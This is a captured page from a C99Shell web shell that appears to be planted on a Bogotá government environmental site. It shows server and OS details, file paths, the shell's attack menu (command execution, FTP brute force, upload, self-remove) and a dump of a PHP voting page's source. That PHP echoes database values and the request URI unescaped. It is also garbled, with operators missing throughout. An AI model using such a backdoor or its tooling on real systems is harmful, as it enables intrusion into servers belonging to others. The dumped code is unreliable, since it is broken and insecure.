!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\ambientebogota.gov.co\Tomemos_Conciencia\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     votacionDetalle.php (22.1 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php require_once('../Connections/local.php'); ?>
<?php

switch ($_GET['cat']) {
    case "Ciudadanos":
        $label "Organización";
        break;
    case "Empresas":
        $label "Sector económico";
        break;
    case "Estudiantes":
        $label "Institución educativa";
        break;
}


if (!function_exists("GetSQLValueString")) {
function GetSQLValueString($theValue$theType$theDefinedValue ""$theNotDefinedValue ""
{
  if (PHP_VERSION 6) {
    $theValue get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue;
  }

  $theValue function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue);

  switch ($theType) {
    case "text":
      $theValue = ($theValue != "") ? "'" $theValue "'" "NULL";
      break;    
    case "long":
    case "int":
      $theValue = ($theValue != "") ? intval($theValue) : "NULL";
      break;
    case "double":
      $theValue = ($theValue != "") ? doubleval($theValue) : "NULL";
      break;
    case "date":
      $theValue = ($theValue != "") ? "'" $theValue "'" "NULL";
      break;
    case "defined":
      $theValue = ($theValue != "") ? $theDefinedValue $theNotDefinedValue;
      break;
  }
  return $theValue;
}
}

$colname_detalle_inscripcion "-1";
if (isset($_GET['tema'])) {
  $colname_detalle_inscripcion $_GET['tema'];
}
$cat_detalle_inscripcion "1";
if (isset($_GET['cat'])) {
  $cat_detalle_inscripcion $_GET['cat'];
}
mysql_select_db($database_local$local);
$query_detalle_inscripcion sprintf("SELECT * FROM inscripciones WHERE tema = %s AND categoria = %s"GetSQLValueString($colname_detalle_inscripcion"text"),GetSQLValueString($cat_detalle_inscripcion"text"));
$detalle_inscripcion mysql_query($query_detalle_inscripcion$local) or die(mysql_error());
$row_detalle_inscripcion mysql_fetch_assoc($detalle_inscripcion);
$totalRows_detalle_inscripcion mysql_num_rows($detalle_inscripcion);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>O Tomamos Conciencia o No Tomamos Nada</title>
<style type="text/css">
<!--
body {
    margin-left: 0px;
    margin-top: 0px;
    background-image: url(Imagenes/fondo_02.jpg);
    background-repeat: repeat-x;
}
.Titulo {
    font-size: 15px;
    color: #1B75BB;
    font-weight: bold;
}
.text {
    font-size: 10pt;
    color: #1B75BB;
}
.Destacado1 {
    color: #1B75BB;
    font-weight: bold;
    font-size: 21px;
}
.Destacado2 {
    color: #1B75BB;
    font-size: 16px;
}
.Estilo2 {
    font-size: 15px;
    color: #1B75BB;
    font-weight: bold;
    font-family: Arial, Helvetica, sans-serif;
    text-align: center;
}
.Estilo5 {
    color: #1B75BB;
    font-weight: bold;
    font-size: 21px;
    font-family: Arial, Helvetica, sans-serif;
    text-align: center;
}
a:link {
    text-decoration: none;
    color: #1B75BB;
}
a:visited {
    text-decoration: none;
    color: #1B75BB;
}
a:hover {
    text-decoration: none;
    color: #1B75BB;
}
a:active {
    text-decoration: none;
    color: #1B75BB;
}
.Estilo7 {
    color: #1B75BB;
    font-family: Arial, Helvetica, sans-serif;
    font-size: 10pt;
    font-weight: bold;
}
-->
</style>
<script src="Scripts/swfobject_modified.js" type="text/javascript"></script>
<script type="text/javascript">
<!--
function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}
function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
//-->
</script>
</head>

<body onload="MM_preloadImages('Imagenes/boton_over_inicio.jpg','Imagenes/boton_over_campaña.jpg','Imagenes/boton_over_participar.jpg','Imagenes/boton_over_votacion.jpg','Imagenes/boton_over_contacto.jpg','Imagenes/boton_over_campana.jpg')">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td>&nbsp;</td>
    <td align="center" valign="top"><table id="Tabla_01" width="1001" height="897" border="0" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
        <tr>
          <td colspan="14" align="left" valign="top"><object id="FlashID" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1000" height="228">
              <param name="movie" value="Flash/cabezote.swf" />
              <param name="quality" value="high" />
              <param name="wmode" value="opaque" />
              <param name="swfversion" value="6.0.65.0" />
              <!-- Esta etiqueta param indica a los usuarios de Flash Player 6.0 r65 o posterior que descarguen la versión más reciente de Flash Player. Elimínela si no desea que los usuarios vean el mensaje. -->
              <param name="expressinstall" value="Scripts/expressInstall.swf" />
              <!-- La siguiente etiqueta object es para navegadores distintos de IE. Ocúltela a IE mediante IECC. --> 
              <!--[if !IE]>-->
              <object type="application/x-shockwave-flash" data="Flash/cabezote.swf" width="1000" height="228">
                <!--<![endif]-->
                <param name="quality" value="high" />
                <param name="wmode" value="opaque" />
                <param name="swfversion" value="6.0.65.0" />
                <param name="expressinstall" value="Scripts/expressInstall.swf" />
                <!-- El navegador muestra el siguiente contenido alternativo para usuarios con Flash Player 6.0 o versiones anteriores. -->
                <div>
                  <h4>El contenido de esta página requiere una versión más reciente de Adobe Flash Player.</h4>
                  <p><a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Obtener Adobe Flash Player" width="112" height="33" /></a></p>
                </div>
                <!--[if !IE]>-->
              </object>
              <!--<![endif]-->
            </object></td>
          <td><img src="Imagenes/espacio.gif" width="1" height="227" alt=""></td>
        </tr>
        <tr>
          <td colspan="14" align="left" valign="top"><img src="Imagenes/SDA.jpg" width="1000" height="93" /></td>
          <td><img src="Imagenes/espacio.gif" width="1" height="93" alt=""></td>
        </tr>
        <tr>
          <td colspan="3" rowspan="3" align="left" valign="top"><a href="http://oab.ambientebogota.gov.co/"><img src="Imagenes/observatorio ambiental.jpg" width="120" height="118" border="0" /></a></td>
          <td colspan="11" align="left" valign="top"><img src="Imagenes/web-1_04.jpg" width="880" height="12" alt=""></td>
          <td><img src="Imagenes/espacio.gif" width="1" height="12" alt=""></td>
        </tr>
        <tr>
          <td rowspan="13" align="left" valign="top"><img src="Imagenes/web-1_05_2.jpg" width="28" height="565" alt=""></td>
          <td align="left" valign="top"><a href="index.php" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('boton_ini','','Imagenes/boton_over_inicio.jpg',1)"><img src="Imagenes/boton_off_inicio.jpg" name="boton_ini" width="72" height="23" border="0" id="boton_ini" /></a></td>
          <td align="left" valign="top"><img src="Imagenes/web-1_07.jpg" width="39" height="23" alt=""></td>
          <td align="left" valign="top"><a href="campana.php" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('boton_campaña','','Imagenes/boton_over_campana.jpg',1)"><img src="Imagenes/boton_off_campana.jpg" name="boton_campaña" width="101" height="23" border="0" id="boton_campaña" /></a></td>
          <td align="left" valign="top"><img src="Imagenes/web-1_09.jpg" width="40" height="23" alt=""></td>
          <td align="left" valign="top"><a href="comoparticipar.php" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('boton_participar','','Imagenes/boton_over_participar.jpg',1)"><img src="Imagenes/boton_off_participar.jpg" name="boton_participar" width="140" height="23" border="0" id="boton_participar" /></a></td>
          <td align="left" valign="top"><img src="Imagenes/web-1_11.jpg" width="40" height="23" alt=""></td>
          <td align="left" valign="top"><a href="votacion.php" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('boton_votacion','','Imagenes/boton_over_votacion.jpg',1)"><img src="Imagenes/boton_off_votacion.jpg" name="boton_votacion" width="94" height="23" border="0" id="boton_votacion" /></a></td>
          <td align="left" valign="top"><img src="Imagenes/web-1_13.jpg" width="39" height="23" alt=""></td>
          <td align="left" valign="top"><a href="contactenos/contactenos.php" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('boton_contacto','','Imagenes/boton_over_contacto.jpg',1)"><img src="Imagenes/boton_off_contacto.jpg" name="boton_contacto" width="139" height="23" border="0" id="boton_contacto" /></a></td>
          <td align="left" valign="top"><img src="Imagenes/web-1_15.jpg" width="148" height="23" alt=""></td>
          <td><img src="Imagenes/espacio.gif" width="1" height="23" alt=""></td>
        </tr>
        <tr>
          <td colspan="8" rowspan="12" align="left" valign="top"><a href="votacion.php" class="Titulo">Regresar</a>
            <?php if ($totalRows_detalle_inscripcion 0) { // Show if recordset not empty ?>
              <p class="Estilo5">Votación <?php echo $row_detalle_inscripcion['categoria']; ?></p>
              <p class="Estilo5"><?php echo $row_detalle_inscripcion['tema']; ?></p>
              <?php do { ?>
                <div class="bloque" id="<?php echo $row_detalle_inscripcion['id']; ?>">
                  <table width="565" border="0" cellspacing="0" cellpadding="0">
                    <tr>
                      <td height="85" class="text Estilo1"><table width="100%" border="0" cellspacing="3" cellpadding="3">
                        <tr>
                          <th width="37%" valign="top" scope="col"><div style="float:left">
                            <table width="200" border="0">
                              <tr>
                                <td><div align="left"><span class="Estilo2">Nombre </span></div></td>
                              </tr>
                            </table>
                            <table width="200" border="0">
                              <tr>
                                <td><div align="left"><?php echo $row_detalle_inscripcion['nombres']; ?></div></td>
                              </tr>
                            </table>
                            <table width="200" border="0">
                              <tr>
                                <td><div align="left"><span class="Estilo2">Localidad </span></div></td>
                              </tr>
                            </table>
                            <table width="200" border="0">
                              <tr>
                                <td><div align="left"><?php echo $row_detalle_inscripcion['localidad']; ?></div></td>
                              </tr>
                            </table>
                            <table width="200" border="0">
                              <tr>
                                <td><div align="left"><span class="Estilo2">
                                  <?= $label ?>
                                </span></div></td>
                              </tr>
                            </table>
                            <table width="200" border="0">
                              <tr>
                                <td><div align="left"><?php echo $row_detalle_inscripcion['cual']; ?></div></td>
                              </tr>
                            </table>
                          </div></th>
                          <th width="63%" valign="top" scope="col"><table width="100%" border="0" align="left">
                            <tr>
                              <td><span class="Estilo2">Descripción</span></td>
                            </tr>
                            <tr>
                              <td class="text"><div align="left"><?php echo $row_detalle_inscripcion['descripcion']; ?></div></td>
                            </tr>
                            <tr>
                              <td class="text">&nbsp;</td>
                            </tr>
                          </table></th>
                        </tr>
                      </table></td>
                    </tr>
                  </table>
                  <table width="226" border="0" align="center">
                    <tr>
                      <td width="220"><div align="center"><img src="Imagenes/vota_03.png" alt="Vota" width="161" height="38" onclick="MM_openBrWindow('votacionVoto.php?id=<?php echo $row_detalle_inscripcion['id']; ?>&amp;cat=<?php echo $row_detalle_inscripcion['categoria']; ?>','darVoto','width=400,height=200')" /></div></td>
                    </tr>
                    <tr>
                      <td align="center" class="text"><a href="<?= $_SERVER['REQUEST_URI'?>#<?php echo $row_detalle_inscripcion['id']; ?>">Link a esta inscripción</a></td>
                    </tr>
                  </table>
                  <hr />
                </div>
                <?php } while ($row_detalle_inscripcion mysql_fetch_assoc($detalle_inscripcion)); ?>
              <?php // Show if recordset not empty ?>
            <?php if ($totalRows_detalle_inscripcion == 0) { // Show if recordset empty ?>
  <p>Llamado invalido de la aplicación</p>
  <?php // Show if recordset empty ?></td>
          <td colspan="2" rowspan="11" align="left" valign="top"><p align="center">
              <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" name="FlashID3" width="282" height="482" id="FlashID3">
                <param name="movie" value="Flash/banner encuentroUltimo.swf" />
                <param name="quality" value="high" />
                <param name="wmode" value="opaque" />
                <param name="swfversion" value="6.0.65.0" />
                <!-- Esta etiqueta param indica a los usuarios de Flash Player 6.0 r65 o posterior que descarguen la versión más reciente de Flash Player. Elimínela si no desea que los usuarios vean el mensaje. -->
                <param name="expressinstall" value="Scripts/expressInstall.swf" />
                <!-- La siguiente etiqueta object es para navegadores distintos de IE. Ocúltela a IE mediante IECC. --> 
                <!--[if !IE]>-->
                <object type="application/x-shockwave-flash" data="Flash/banner encuentroUltimo.swf" width="287" height="541">
                  <!--<![endif]-->
                  <param name="quality" value="high" />
                  <param name="wmode" value="opaque" />
                  <param name="swfversion" value="6.0.65.0" />
                  <param name="expressinstall" value="Scripts/expressInstall.swf" />
                  <!-- El navegador muestra el siguiente contenido alternativo para usuarios con Flash Player 6.0 o versiones anteriores. -->
                  <div>
                    <h4>El contenido de esta página requiere una versión más reciente de Adobe Flash Player.</h4>
                    <p><a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Obtener Adobe Flash Player" width="282" height="482" /></a></p>
                  </div>
                  <!--[if !IE]>-->
                </object>
                <!--<![endif]-->
              </object>
              <a href="bionegocio/bionegocio.php"><img src="Imagenes/boton_bionegocio copia.jpg" alt="Bionegocio" width="232" height="62" border="0"/></a></p></td>
          <td><img src="Imagenes/espacio.gif" width="1" height="83" alt=""></td>
        </tr>
        <tr>
          <td colspan="3" align="left" valign="top"><img src="Imagenes/web-1_18.jpg" width="120" height="19" alt=""></td>
          <td><img src="Imagenes/espacio.gif" width="1" height="19" alt=""></td>
        </tr>
        <tr>
          <td colspan="3" align="left" valign="top"><a href="eventos/eventos.php"><img src="Imagenes/eventos.jpg" width="120" height="36" border="0" /></a></td>
          <td><img src="Imagenes/espacio.gif" width="1" height="36" alt=""></td>
        </tr>
        <tr>
          <td colspan="3" align="left" valign="top"><img src="Imagenes/cont_eventos.jpg" width="120" height="122" border="0"/></td>
          <td><img src="Imagenes/espacio.gif" width="1" height="122" alt=""></td>
        </tr>
        <tr>
          <td colspan="3" align="left" valign="top"><img src="Imagenes/web-1_21.jpg" width="120" height="18" alt=""></td>
          <td><img src="Imagenes/espacio.gif" width="1" height="18" alt=""></td>
        </tr>
        <tr>
          <td colspan="3" align="left" valign="top"><a href="encuentro.php"><img src="Imagenes/encuentro.jpg" width="120" height="38" border="0" /></a></td>
          <td><img src="Imagenes/espacio.gif" width="1" height="38" alt=""></td>
        </tr>
        <tr>
          <td colspan="3" align="left" valign="top"><img src="Imagenes/web-1_23.jpg" width="120" height="18" alt=""></td>
          <td><img src="Imagenes/espacio.gif" width="1" height="18" alt=""></td>
        </tr>
        <tr>
          <td align="left" valign="top"><a href="http://www.facebook.com/pages/O-tomamos-conciencia-o-no-tomamos-nada/114328635287809"><img src="Imagenes/facebook.jpg" width="58" height="57" border="0"/></a></td>
          <td align="left" valign="top"><img src="Imagenes/web-1_25.jpg" width="8" height="57" alt=""></td>
          <td align="left" valign="top"><a href="http://twitter.com/Tomo_Conciencia"><img src="Imagenes/twitter.jpg" width="54" height="57" border="0"/></a></td>
          <td><img src="Imagenes/espacio.gif" width="1" height="57" alt=""></td>
        </tr>
        <tr>
          <td colspan="3" align="left" valign="top"><img src="Imagenes/web-1_27.jpg" width="120" height="17" alt=""></td>
          <td><img src="Imagenes/espacio.gif" width="1" height="17" alt=""></td>
        </tr>
        <tr>
          <td colspan="3" align="left" valign="top"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="120" height="108" id="FlashID2" title="banner_aliados">
              <param name="movie" value="Flash/banner aliados.swf" />
              <param name="quality" value="high" />
              <param name="wmode" value="opaque" />
              <param name="swfversion" value="6.0.65.0" />
              <!-- Esta etiqueta param indica a los usuarios de Flash Player 6.0 r65 o posterior que descarguen la versión más reciente de Flash Player. Elimínela si no desea que los usuarios vean el mensaje. -->
              <param name="expressinstall" value="Scripts/expressInstall.swf" />
              <!-- La siguiente etiqueta object es para navegadores distintos de IE. Ocúltela a IE mediante IECC. --> 
              <!--[if !IE]>-->
              <object type="application/x-shockwave-flash" data="Flash/banner aliados.swf" width="120" height="108">
                <!--<![endif]-->
                <param name="quality" value="high" />
                <param name="wmode" value="opaque" />
                <param name="swfversion" value="6.0.65.0" />
                <param name="expressinstall" value="Scripts/expressInstall.swf" />
                <!-- El navegador muestra el siguiente contenido alternativo para usuarios con Flash Player 6.0 o versiones anteriores. -->
                <div>
                  <h4>El contenido de esta página requiere una versión más reciente de Adobe Flash Player.</h4>
                  <p><a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Obtener Adobe Flash Player" width="112" height="33" /></a></p>
                </div>
                <!--[if !IE]>-->
              </object>
              <!--<![endif]-->
            </object></td>
          <td><img src="Imagenes/espacio.gif" width="1" height="110" alt=""></td>
        </tr>
        <tr>
          <td colspan="3" rowspan="2" align="left" valign="top"><img src="Imagenes/web-1_29.jpg" width="120" height="24" alt=""></td>
          <td><img src="Imagenes/espacio.gif" width="1" height="23" alt=""></td>
        </tr>
        <tr>
          <td colspan="2" align="left" valign="top"><img src="Imagenes/web-1_30.jpg" width="287" height="1" alt=""></td>
          <td><img src="Imagenes/espacio.gif" width="1" height="1" alt=""></td>
        </tr>
      </table></td>
    <td>&nbsp;</td>
  </tr>
</table>
<script type="text/javascript">
<!--
swfobject.registerObject("FlashID2");
swfobject.registerObject("FlashID");
swfobject.registerObject("FlashID3");
//-->
</script>
<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-10523892-15']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>
</body>
</html>
<?php
mysql_free_result($detalle_inscripcion);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--